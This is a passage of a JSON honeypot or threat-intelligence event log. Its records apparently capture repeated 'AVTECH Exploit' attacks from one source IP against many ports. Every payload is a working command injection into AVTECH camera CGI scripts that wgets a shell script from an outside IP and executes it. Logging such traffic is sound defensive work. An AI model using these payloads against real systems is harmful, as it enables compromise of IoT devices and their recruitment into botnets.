3451.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3452.       "post_data": "",
3453.       "target_port": 2083,
3454.       "protocol": "tcp",
3455.       "tags": [
3456.         {
3457.           "cve": "",
3458.           "category": "IoT",
3459.           "description": "AVTECH Exploit"
3460.         }
3461.       ],
3462.       "event_count": 5,
3463.       "first_seen": "2020-06-01T05:02:14Z",
3464.       "last_seen": "2020-06-01T05:22:16Z"
3465.     },
3466.     {
3467.       "event_id": "d64ef30af29e43c0cefcd09ab04928590bd7947809204f454ab11adcd3375a86",
3468.       "source_ip_address": "193.142.146.34",
3469.       "country": "NL",
3470.       "user_agent": "Snickers-Avtech",
3471.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3472.       "post_data": "",
3473.       "target_port": 2083,
3474.       "protocol": "tcp",
3475.       "tags": [
3476.         {
3477.           "cve": "",
3478.           "category": "IoT",
3479.           "description": "AVTECH Exploit"
3480.         }
3481.       ],
3482.       "event_count": 5,
3483.       "first_seen": "2020-06-01T05:02:07Z",
3484.       "last_seen": "2020-06-01T05:22:10Z"
3485.     },
3486.     {
3487.       "event_id": "a6057ffdadfda85e5541e3bd7371dde914e402a5051127e2b0836c81cab3cff5",
3488.       "source_ip_address": "193.142.146.34",
3489.       "country": "NL",
3490.       "user_agent": "Snickers-Avtech",
3491.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3492.       "post_data": "",
3493.       "target_port": 8008,
3494.       "protocol": "tcp",
3495.       "tags": [
3496.         {
3497.           "cve": "",
3498.           "category": "IoT",
3499.           "description": "AVTECH Exploit"
3500.         }
3501.       ],
3502.       "event_count": 5,
3503.       "first_seen": "2020-06-01T05:05:22Z",
3504.       "last_seen": "2020-06-01T05:21:07Z"
3505.     },
3506.     {
3507.       "event_id": "e003394e097114bd08af1e71d49b40ddd7651b2834e46af6e73467abfe1edccf",
3508.       "source_ip_address": "193.142.146.34",
3509.       "country": "NL",
3510.       "user_agent": "Snickers-Avtech",
3511.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3512.       "post_data": "",
3513.       "target_port": 5001,
3514.       "protocol": "tcp",
3515.       "tags": [
3516.         {
3517.           "cve": "",
3518.           "category": "IoT",
3519.           "description": "AVTECH Exploit"
3520.         }
3521.       ],
3522.       "event_count": 4,
3523.       "first_seen": "2020-06-01T05:02:56Z",
3524.       "last_seen": "2020-06-01T05:21:05Z"
3525.     },
3526.     {
3527.       "event_id": "95bdb6eabbb7545314f57c69dd67009ea979318667e5f9b06ea3aefe616d62a1",
3528.       "source_ip_address": "193.142.146.34",
3529.       "country": "NL",
3530.       "user_agent": "Snickers-Avtech",
3531.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3532.       "post_data": "",
3533.       "target_port": 8008,
3534.       "protocol": "tcp",
3535.       "tags": [
3536.         {
3537.           "cve": "",
3538.           "category": "IoT",
3539.           "description": "AVTECH Exploit"
3540.         }
3541.       ],
3542.       "event_count": 5,
3543.       "first_seen": "2020-06-01T05:05:16Z",
3544.       "last_seen": "2020-06-01T05:21:01Z"
3545.     },
3546.     {
3547.       "event_id": "cffaabaec5c99d59a1fab305170c38a4bbd0c4e2d4615a22876a22f5dc8de4d1",
3548.       "source_ip_address": "193.142.146.34",
3549.       "country": "NL",
3550.       "user_agent": "Snickers-Avtech",
3551.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3552.       "post_data": "",
3553.       "target_port": 5001,
3554.       "protocol": "tcp",
3555.       "tags": [
3556.         {
3557.           "cve": "",
3558.           "category": "IoT",
3559.           "description": "AVTECH Exploit"
3560.         }
3561.       ],
3562.       "event_count": 4,
3563.       "first_seen": "2020-06-01T05:02:48Z",
3564.       "last_seen": "2020-06-01T05:20:59Z"
3565.     },
3566.     {
3567.       "event_id": "a616eca631d22ec13355047813a6cb3c437022130250b4a0b3853c2b01883f0e",
3568.       "source_ip_address": "193.142.146.34",
3569.       "country": "NL",
3570.       "user_agent": "Snickers-Avtech",
3571.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3572.       "post_data": "",
3573.       "target_port": 8082,
3574.       "protocol": "tcp",
3575.       "tags": [
3576.         {
3577.           "cve": "",
3578.           "category": "IoT",
3579.           "description": "AVTECH Exploit"
3580.         }
3581.       ],
3582.       "event_count": 1,
3583.       "first_seen": "2020-06-01T05:20:45Z",
3584.       "last_seen": "2020-06-01T05:20:45Z"
3585.     },
3586.     {
3587.       "event_id": "ebe80f2aebcc73241b2d84a37c408f3a63783e9922bbfe284cd749dae148cb1f",
3588.       "source_ip_address": "193.142.146.34",
3589.       "country": "NL",
3590.       "user_agent": "Snickers-Avtech",
3591.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3592.       "post_data": "",
3593.       "target_port": 8082,
3594.       "protocol": "tcp",
3595.       "tags": [
3596.         {
3597.           "cve": "",
3598.           "category": "IoT",
3599.           "description": "AVTECH Exploit"
3600.         }
3601.       ],
3602.       "event_count": 1,
3603.       "first_seen": "2020-06-01T05:20:39Z",
3604.       "last_seen": "2020-06-01T05:20:39Z"
3605.     },
3606.     {
3607.       "event_id": "00bb1d506f80dfa0ea433369a7487312a2e11b6814dad997647b2a3a14243ec5",
3608.       "source_ip_address": "193.142.146.34",
3609.       "country": "NL",
3610.       "user_agent": "Snickers-Avtech",
3611.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3612.       "post_data": "",
3613.       "target_port": 49152,
3614.       "protocol": "tcp",
3615.       "tags": [
3616.         {
3617.           "cve": "",
3618.           "category": "IoT",
3619.           "description": "AVTECH Exploit"
3620.         }
3621.       ],
3622.       "event_count": 1,
3623.       "first_seen": "2020-06-01T05:20:18Z",
3624.       "last_seen": "2020-06-01T05:20:18Z"
3625.     },
3626.     {
3627.       "event_id": "b077cba54577b840f0e51ea0618df9104b7aedb31e91a41ab76ee54a57063873",
3628.       "source_ip_address": "193.142.146.34",
3629.       "country": "NL",
3630.       "user_agent": "Snickers-Avtech",
3631.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3632.       "post_data": "",
3633.       "target_port": 9001,
3634.       "protocol": "tcp",
3635.       "tags": [
3636.         {
3637.           "cve": "",
3638.           "category": "IoT",
3639.           "description": "AVTECH Exploit"
3640.         }
3641.       ],
3642.       "event_count": 3,
3643.       "first_seen": "2020-06-01T05:05:45Z",
3644.       "last_seen": "2020-06-01T05:20:14Z"
3645.     },
3646.     {
3647.       "event_id": "24779a54543793d47ac21e403ef0ad356c392a6bc854c37f78ebd02002ec75cd",
3648.       "source_ip_address": "193.142.146.34",
3649.       "country": "NL",
3650.       "user_agent": "Snickers-Avtech",
3651.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3652.       "post_data": "",
3653.       "target_port": 49152,
3654.       "protocol": "tcp",
3655.       "tags": [
3656.         {
3657.           "cve": "",
3658.           "category": "IoT",
3659.           "description": "AVTECH Exploit"
3660.         }
3661.       ],
3662.       "event_count": 1,
3663.       "first_seen": "2020-06-01T05:20:11Z",
3664.       "last_seen": "2020-06-01T05:20:11Z"
3665.     },
3666.     {
3667.       "event_id": "a212c53d9df997fa7adc05df7e066d75a023d764adbaa05ada0056b5d9ae8c83",
3668.       "source_ip_address": "193.142.146.34",
3669.       "country": "NL",
3670.       "user_agent": "Snickers-Avtech",
3671.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3672.       "post_data": "",
3673.       "target_port": 81,
3674.       "protocol": "tcp",
3675.       "tags": [
3676.         {
3677.           "cve": "",
3678.           "category": "IoT",
3679.           "description": "AVTECH Exploit"
3680.         }
3681.       ],
3682.       "event_count": 2,
3683.       "first_seen": "2020-06-01T05:14:06Z",
3684.       "last_seen": "2020-06-01T05:19:46Z"
3685.     },
3686.     {
3687.       "event_id": "fd803d50d4e12c65c011bbbb0b91a31dab4eb551a049f75ae9a7aba608405678",
3688.       "source_ip_address": "193.142.146.34",
3689.       "country": "NL",
3690.       "user_agent": "Snickers-Avtech",
3691.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3692.       "post_data": "",
3693.       "target_port": 81,
3694.       "protocol": "tcp",
3695.       "tags": [
3696.         {
3697.           "cve": "",
3698.           "category": "IoT",
3699.           "description": "AVTECH Exploit"
3700.         }
3701.       ],
3702.       "event_count": 2,
3703.       "first_seen": "2020-06-01T05:13:59Z",
3704.       "last_seen": "2020-06-01T05:19:38Z"
3705.     },
3706.     {
3707.       "event_id": "3ecff735092db24995c194fee4d80a921a33932a62de19e4d4696cbbaeed7bf6",
3708.       "source_ip_address": "193.142.146.34",
3709.       "country": "NL",
3710.       "user_agent": "Snickers-Avtech",
3711.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3712.       "post_data": "",
3713.       "target_port": 8009,
3714.       "protocol": "tcp",
3715.       "tags": [
3716.         {
3717.           "cve": "",
3718.           "category": "IoT",
3719.           "description": "AVTECH Exploit"
3720.         }
3721.       ],
3722.       "event_count": 3,
3723.       "first_seen": "2020-06-01T05:11:27Z",
3724.       "last_seen": "2020-06-01T05:19:24Z"
3725.     },
3726.     {
3727.       "event_id": "206dfd4f0ab4db09d2e3d098c2b3849dd25f7d6581e866610e520611d291b179",
3728.       "source_ip_address": "193.142.146.34",
3729.       "country": "NL",
3730.       "user_agent": "Snickers-Avtech",
3731.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3732.       "post_data": "",
3733.       "target_port": 9000,
3734.       "protocol": "tcp",
3735.       "tags": [
3736.         {
3737.           "cve": "",
3738.           "category": "IoT",
3739.           "description": "AVTECH Exploit"
3740.         }
3741.       ],
3742.       "event_count": 5,
3743.       "first_seen": "2020-06-01T05:01:10Z",
3744.       "last_seen": "2020-06-01T05:19:19Z"
3745.     },
3746.     {
3747.       "event_id": "4f25fc959c81e1bb5913d97953a82f36622c30eb79386fbe54db4bf2820d66b1",
3748.       "source_ip_address": "193.142.146.34",
3749.       "country": "NL",
3750.       "user_agent": "Snickers-Avtech",
3751.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3752.       "post_data": "",
3753.       "target_port": 8009,
3754.       "protocol": "tcp",
3755.       "tags": [
3756.         {
3757.           "cve": "",
3758.           "category": "IoT",
3759.           "description": "AVTECH Exploit"
3760.         }
3761.       ],
3762.       "event_count": 3,
3763.       "first_seen": "2020-06-01T05:11:18Z",
3764.       "last_seen": "2020-06-01T05:19:17Z"
3765.     },
3766.     {
3767.       "event_id": "403ff68437cc90bd36b993dd44f22f5fec502e8f29a341a1410e5bd48171ee60",
3768.       "source_ip_address": "193.142.146.34",
3769.       "country": "NL",
3770.       "user_agent": "Snickers-Avtech",
3771.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3772.       "post_data": "",
3773.       "target_port": 9000,
3774.       "protocol": "tcp",
3775.       "tags": [
3776.         {
3777.           "cve": "",
3778.           "category": "IoT",
3779.           "description": "AVTECH Exploit"
3780.         }
3781.       ],
3782.       "event_count": 5,
3783.       "first_seen": "2020-06-01T05:01:03Z",
3784.       "last_seen": "2020-06-01T05:19:13Z"
3785.     },
3786.     {
3787.       "event_id": "62c8767b4cb6e8599e65e157d354daf1c723049c295b25e65c728b269fa2e691",
3788.       "source_ip_address": "193.142.146.34",
3789.       "country": "NL",
3790.       "user_agent": "Snickers-Avtech",
3791.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3792.       "post_data": "",
3793.       "target_port": 8880,
3794.       "protocol": "tcp",
3795.       "tags": [
3796.         {
3797.           "cve": "",
3798.           "category": "IoT",
3799.           "description": "AVTECH Exploit"
3800.         }
3801.       ],
3802.       "event_count": 1,
3803.       "first_seen": "2020-06-01T05:19:04Z",
3804.       "last_seen": "2020-06-01T05:19:04Z"
3805.     },
3806.     {
3807.       "event_id": "b5e53f71ba8b4224f092a46d48a01bda11a9970c003668ef19e97ba8bce92292",
3808.       "source_ip_address": "193.142.146.34",
3809.       "country": "NL",
3810.       "user_agent": "Snickers-Avtech",
3811.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3812.       "post_data": "",
3813.       "target_port": 8880,
3814.       "protocol": "tcp",
3815.       "tags": [
3816.         {
3817.           "cve": "",
3818.           "category": "IoT",
3819.           "description": "AVTECH Exploit"
3820.         }
3821.       ],
3822.       "event_count": 1,
3823.       "first_seen": "2020-06-01T05:18:58Z",
3824.       "last_seen": "2020-06-01T05:18:58Z"
3825.     },
3826.     {
3827.       "event_id": "b3b816201424b72991dffee37590da0b075e4419fa29b82399e762bca4225189",
3828.       "source_ip_address": "193.142.146.34",
3829.       "country": "NL",
3830.       "user_agent": "Snickers-Avtech",
3831.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3832.       "post_data": "",
3833.       "target_port": 8443,
3834.       "protocol": "tcp",
3835.       "tags": [
3836.         {
3837.           "cve": "",
3838.           "category": "IoT",
3839.           "description": "AVTECH Exploit"
3840.         }
3841.       ],
3842.       "event_count": 5,
3843.       "first_seen": "2020-06-01T05:02:47Z",
3844.       "last_seen": "2020-06-01T05:18:58Z"
3845.     },
3846.     {
3847.       "event_id": "6bdf731535d3782aedd5d8c920a25b2b13406c0a832ca788bb5bf5f44b5a8c08",
3848.       "source_ip_address": "193.142.146.34",
3849.       "country": "NL",
3850.       "user_agent": "Snickers-Avtech",
3851.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3852.       "post_data": "",
3853.       "target_port": 8443,
3854.       "protocol": "tcp",
3855.       "tags": [
3856.         {
3857.           "cve": "",
3858.           "category": "IoT",
3859.           "description": "AVTECH Exploit"
3860.         }
3861.       ],
3862.       "event_count": 5,
3863.       "first_seen": "2020-06-01T05:02:39Z",
3864.       "last_seen": "2020-06-01T05:18:51Z"
3865.     },
3866.     {
3867.       "event_id": "2d62b4a31738f25a18f8a84c597deab0ba4c947ea3be7b5e00f418823ae83450",
3868.       "source_ip_address": "193.142.146.34",
3869.       "country": "NL",
3870.       "user_agent": "Snickers-Avtech",
3871.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3872.       "post_data": "",
3873.       "target_port": 443,
3874.       "protocol": "tcp",
3875.       "tags": [
3876.         {
3877.           "cve": "",
3878.           "category": "IoT",
3879.           "description": "AVTECH Exploit"
3880.         }
3881.       ],
3882.       "event_count": 4,
3883.       "first_seen": "2020-06-01T05:02:03Z",
3884.       "last_seen": "2020-06-01T05:18:48Z"
3885.     },
3886.     {
3887.       "event_id": "86b4a2bd0fa40691199c5ff0cf201c222b42f3a77060a0dfaf20c47b0d7f3414",
3888.       "source_ip_address": "193.142.146.34",
3889.       "country": "NL",
3890.       "user_agent": "Snickers-Avtech",
3891.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3892.       "post_data": "",
3893.       "target_port": 443,
3894.       "protocol": "tcp",
3895.       "tags": [
3896.         {
3897.           "cve": "",
3898.           "category": "IoT",
3899.           "description": "AVTECH Exploit"
3900.         }
3901.       ],
3902.       "event_count": 4,
3903.       "first_seen": "2020-06-01T05:01:55Z",
3904.       "last_seen": "2020-06-01T05:18:43Z"
3905.     },
3906.     {
3907.       "event_id": "574ee0e872b9827e20ee61651c7174f349e4119882d954c182709b3ab283afb0",
3908.       "source_ip_address": "193.142.146.34",
3909.       "country": "NL",
3910.       "user_agent": "Snickers-Avtech",
3911.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3912.       "post_data": "",
3913.       "target_port": 1388,
3914.       "protocol": "tcp",
3915.       "tags": [
3916.         {
3917.           "cve": "",
3918.           "category": "IoT",
3919.           "description": "AVTECH Exploit"
3920.         }
3921.       ],
3922.       "event_count": 1,
3923.       "first_seen": "2020-06-01T05:18:34Z",
3924.       "last_seen": "2020-06-01T05:18:34Z"
3925.     },
3926.     {
3927.       "event_id": "0f12af1bd5ca47fd5d497ef604d3083d6f88ffabcca187db8a5013cfeed822cf",
3928.       "source_ip_address": "193.142.146.34",
3929.       "country": "NL",
3930.       "user_agent": "Snickers-Avtech",
3931.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
3932.       "post_data": "",
3933.       "target_port": 1388,
3934.       "protocol": "tcp",
3935.       "tags": [
3936.         {
3937.           "cve": "",
3938.           "category": "IoT",
3939.           "description": "AVTECH Exploit"
3940.         }
3941.       ],
3942.       "event_count": 1,
3943.       "first_seen": "2020-06-01T05:18:27Z",
3944.       "last_seen": "2020-06-01T05:18:27Z"
3945.     },
3946.     {
3947.       "event_id": "8dad686ca57336a9ad489b7a8ad2b961c3acb5db8b7dcf225da55d82de9ece9a",
3948.       "source_ip_address": "193.142.146.34",
3949.       "country": "NL",
3950.       "user_agent": "Snickers-Avtech",
3951.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3952.       "post_data": "",
3953.       "target_port": 3389,
3954.       "protocol": "tcp",
3955.       "tags": [
3956.         {
3957.           "cve": "",
3958.           "category": "IoT",
3959.           "description": "AVTECH Exploit"
3960.         }
3961.       ],
3962.       "event_count": 2,
3963.       "first_seen": "2020-06-01T05:12:35Z",
3964.       "last_seen": "2020-06-01T05:17:25Z"
3965.     },
3966.     {
3967.       "event_id": "fff8a0bfa9814163865a7eeb8fabf1772215c29695760226c016d7a1b5a6c099",
3968.       "source_ip_address": "193.142.146.34",
3969.       "country": "NL",
3970.       "user_agent": "Snickers-Avtech",
3971.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3972.       "post_data": "",
3973.       "target_port": 16992,
3974.       "protocol": "tcp",
3975.       "tags": [
3976.         {
3977.           "cve": "",
3978.           "category": "IoT",
3979.           "description": "AVTECH Exploit"
3980.         }
3981.       ],
3982.       "event_count": 2,
3983.       "first_seen": "2020-06-01T05:08:23Z",
3984.       "last_seen": "2020-06-01T05:17:23Z"
3985.     },
3986.     {
3987.       "event_id": "f77f145bada76892a278b75b4dca539f75980b8f59505a9a2db8b7ae83b48edf",
3988.       "source_ip_address": "193.142.146.34",
3989.       "country": "NL",
3990.       "user_agent": "Snickers-Avtech",
3991.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
3992.       "post_data": "",
3993.       "target_port": 4369,
3994.       "protocol": "tcp",
3995.       "tags": [
3996.         {
3997.           "cve": "",
3998.           "category": "IoT",
3999.           "description": "AVTECH Exploit"
4000.         }
4001.       ],
4002.       "event_count": 2,
4003.       "first_seen": "2020-06-01T05:15:57Z",
4004.       "last_seen": "2020-06-01T05:17:22Z"
4005.     },
4006.     {
4007.       "event_id": "faa6593615736763aea0f3975f0f88f4f272a952c40a909e3f3f205297dd2295",
4008.       "source_ip_address": "193.142.146.34",
4009.       "country": "NL",
4010.       "user_agent": "Snickers-Avtech",
4011.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4012.       "post_data": "",
4013.       "target_port": 3389,
4014.       "protocol": "tcp",
4015.       "tags": [
4016.         {
4017.           "cve": "",
4018.           "category": "IoT",
4019.           "description": "AVTECH Exploit"
4020.         }
4021.       ],
4022.       "event_count": 2,
4023.       "first_seen": "2020-06-01T05:12:28Z",
4024.       "last_seen": "2020-06-01T05:17:18Z"
4025.     },
4026.     {
4027.       "event_id": "46ac132826b1648c8ead774835629da0c7a9c80cfc249ff95de4093424f182b0",
4028.       "source_ip_address": "193.142.146.34",
4029.       "country": "NL",
4030.       "user_agent": "Snickers-Avtech",
4031.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4032.       "post_data": "",
4033.       "target_port": 16992,
4034.       "protocol": "tcp",
4035.       "tags": [
4036.         {
4037.           "cve": "",
4038.           "category": "IoT",
4039.           "description": "AVTECH Exploit"
4040.         }
4041.       ],
4042.       "event_count": 2,
4043.       "first_seen": "2020-06-01T05:08:15Z",
4044.       "last_seen": "2020-06-01T05:17:17Z"
4045.     },
4046.     {
4047.       "event_id": "f3ae750fdb33b96f3d087c1a62c875828a753f834ac505b920db1285033aa597",
4048.       "source_ip_address": "193.142.146.34",
4049.       "country": "NL",
4050.       "user_agent": "Snickers-Avtech",
4051.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4052.       "post_data": "",
4053.       "target_port": 4369,
4054.       "protocol": "tcp",
4055.       "tags": [
4056.         {
4057.           "cve": "",
4058.           "category": "IoT",
4059.           "description": "AVTECH Exploit"
4060.         }
4061.       ],
4062.       "event_count": 2,
4063.       "first_seen": "2020-06-01T05:15:47Z",
4064.       "last_seen": "2020-06-01T05:17:15Z"
4065.     },
4066.     {
4067.       "event_id": "d4d9c95ce93901830aaf44509eaa30fc874d42885a22cc9167fe7fb1f56bdaed",
4068.       "source_ip_address": "193.142.146.34",
4069.       "country": "NL",
4070.       "user_agent": "Snickers-Avtech",
4071.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4072.       "post_data": "",
4073.       "target_port": 9002,
4074.       "protocol": "tcp",
4075.       "tags": [
4076.         {
4077.           "cve": "",
4078.           "category": "IoT",
4079.           "description": "AVTECH Exploit"
4080.         }
4081.       ],
4082.       "event_count": 4,
4083.       "first_seen": "2020-06-01T05:01:22Z",
4084.       "last_seen": "2020-06-01T05:17:04Z"
4085.     },
4086.     {
4087.       "event_id": "c6f1708d80dbaa2559765df50d42b4eb6fa5c0bb5435879d436babc62d386080",
4088.       "source_ip_address": "193.142.146.34",
4089.       "country": "NL",
4090.       "user_agent": "Snickers-Avtech",
4091.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh )&password=admin HTTP/1.1",
4092.       "post_data": "",
4093.       "target_port": 9002,
4094.       "protocol": "tcp",
4095.       "tags": [
4096.         {
4097.           "cve": "",
4098.           "category": "IoT",
4099.           "description": "AVTECH Exploit"
4100.         }
4101.       ],
4102.       "event_count": 4,
4103.       "first_seen": "2020-06-01T05:01:14Z",
4104.       "last_seen": "2020-06-01T05:16:59Z"
4105.     },
4106.     {
4107.       "event_id": "b81a75023283645c7be3b4efe0d7408be590239aef4954192debf6b2b4da574d",
4108.       "source_ip_address": "193.142.146.34",
4109.       "country": "NL",
4110.       "user_agent": "Snickers-Avtech",
4111.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh ; echo snickers_was_here HTTP/1.1",
4112.       "post_data": "",
4113.       "target_port": 8089,
4114.       "protocol": "tcp",
4115.       "tags": [
4116.         {
4117.           "cve": "",
4118.           "category": "IoT",
4119.           "description": "AVTECH Exploit"
4120.         }
4121.       ],
4122.       "event_count": 4,
